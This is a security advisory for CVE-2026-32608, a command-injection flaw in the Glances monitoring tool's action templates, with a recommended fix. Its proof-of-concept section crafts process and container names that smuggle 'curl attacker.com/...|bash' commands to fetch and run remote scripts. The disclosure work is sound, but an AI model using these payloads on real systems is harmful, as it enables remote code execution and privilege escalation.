GHSA-vcv2-q258-wrg7
Suggest an improvement- Source
- https://github.com/advisories/GHSA-vcv2-q258-wrg7
- Import Source
- https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/03/GHSA-vcv2-q258-wrg7/GHSA-vcv2-q258-wrg7.json
- JSON Data
- https://api.osv.dev/v1/vulns/GHSA-vcv2-q258-wrg7
- Aliases
-
- CVE-2026-32608
- Published
- 2026-03-16T16:26:22Z
- Modified
- 2026-03-19T21:16:19.796413Z
- Severity
-
- 7.0 (High) CVSS_V3 - CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H CVSS Calculator
- Summary
- Glances has a Command Injection via Process Names in Action Command Templates
- Details
-
Summary
The Glances action system allows administrators to configure shell commands that execute when monitoring thresholds are exceeded. These commands support Mustache template variables (e.g.,
{{name}},{{key}}) that are populated with runtime monitoring data. Thesecure_popen()function, which executes these commands, implements its own pipe, redirect, and chain operator handling by splitting the command string before passing each segment tosubprocess.Popen(shell=False). When a Mustache-rendered value (such as a process name, filesystem mount point, or container name) contains pipe, redirect, or chain metacharacters, the rendered command is split in unintended ways, allowing an attacker who controls a process name or container name to inject arbitrary commands.Details
The action execution flow:
- Admin configures an action in glances.conf (documented feature):
[cpu] critical_action=echo "High CPU on {{name}}" | mail admin@example.com- When the threshold is exceeded, the plugin model renders the template with runtime stats (glances/plugins/plugin/model.py:943):
self.actions.run(stat_name, trigger, command, repeat, mustache_dict=mustache_dict)The mustachedict contains the full stat dictionary, including user-controllable fields like process name, filesystem mntpoint, container name, etc. (glances/plugins/plugin/model.py:920-943).
In glances/actions.py:77-78, the Mustache library renders the template:
if chevron_tag: cmd_full = chevron.render(cmd, mustache_dict)- The rendered command is passed to secure_popen() (glances/actions.py:84):
ret = secure_popen(cmd_full)The secure_popen vulnerability (glances/secure.py:17-30):
def secure_popen(cmd): ret = "" for c in cmd.split("&&"): ret += __secure_popen(c) return retAnd _securepopen() (glances/secure.py:33-77) splits by > and | then calls Popen(subcmdsplit, shell=False) for each segment. The function splits the ENTIRE command string (including Mustache-rendered user data) by &&, >, and | characters, then executes each segment as a separate subprocess.
Additionally, the redirect handler at line 69-72 writes to arbitrary file paths:
if stdout_redirect is not None: with open(stdout_redirect, "w") as stdout_redirect_file: stdout_redirect_file.write(ret)PoC
Scenario 1: Command injection via pipe in process name
# 1. Admin configures processlist action in glances.conf: # [processlist] # critical_action=echo "ALERT: {{name}} used {{cpu_percent}}% CPU" >> /tmp/alerts.log # 2. Attacker creates a process with a crafted name containing a pipe: cp /bin/sleep "/tmp/innocent|curl attacker.com/evil.sh|bash" "/tmp/innocent|curl attacker.com/evil.sh|bash" 9999 & # 3. When the process triggers a critical alert, secure_popen splits by |: # Command 1: echo "ALERT: innocent # Command 2: curl attacker.com/evil.sh <-- INJECTED # Command 3: bash used 99% CPU" >> /tmp/alerts.logScenario 2: Command chain via && in container name
# 1. Admin configures containers action: # [containers] # critical_action=docker stats {{name}} --no-stream # 2. Attacker names a Docker container with && injection: docker run --name "web && curl attacker.com/rev.sh | bash && echo " nginx # 3. secure_popen splits by &&: # Command 1: docker stats web # Command 2: curl attacker.com/rev.sh | bash <-- INJECTED # Command 3: echo --no-streamImpact
Arbitrary command execution: An attacker who can control a process name, container name, filesystem mount point, or other monitored entity name can execute arbitrary commands as the Glances process user (often root).
Privilege escalation: If Glances runs as root (common for full system monitoring), a low-privileged user who can create processes can escalate to root.
Arbitrary file write: The > redirect handling in secure_popen enables writing arbitrary content to arbitrary file paths.
Preconditions: Requires admin-configured action templates referencing user-controllable fields + attacker ability to run processes on monitored system.
Recommended Fix
Sanitize Mustache-rendered values before secure_popen processes them:
# glances/actions.py def _escape_for_secure_popen(value): """Escape characters that secure_popen treats as operators.""" if not isinstance(value, str): return value value = value.replace("&&", " ") value = value.replace("|", " ") value = value.replace(">", " ") return value def run(self, stat_name, criticality, commands, repeat, mustache_dict=None): for cmd in commands: if chevron_tag: if mustache_dict: safe_dict = { k: _escape_for_secure_popen(v) if isinstance(v, str) else v for k, v in mustache_dict.items() } else: safe_dict = mustache_dict cmd_full = chevron.render(cmd, safe_dict) else: cmd_full = cmd ... - Database specific
{ "github_reviewed_at": "2026-03-16T16:26:22Z", "github_reviewed": true, "cwe_ids": [ "CWE-78" ], "nvd_published_at": "2026-03-18T07:16:21Z", "severity": "HIGH" }- References
-
- https://github.com/nicolargo/glances/security/advisories/GHSA-vcv2-q258-wrg7
- https://nvd.nist.gov/vuln/detail/CVE-2026-32608
- https://github.com/nicolargo/glances/commit/6f4ec53d967478e69917078e6f73f448001bf107
- https://github.com/nicolargo/glances
- https://github.com/nicolargo/glances/releases/tag/v4.5.2
Affected packages
PyPI / glances
Package
- Name
- glances
- View open source insights on deps.dev
- Purl
- pkg:pypi/glances
Affected ranges
- Type
- ECOSYSTEM
- Events
-
Introduced0Unknown introduced version / All previous versions are affectedFixed4.5.2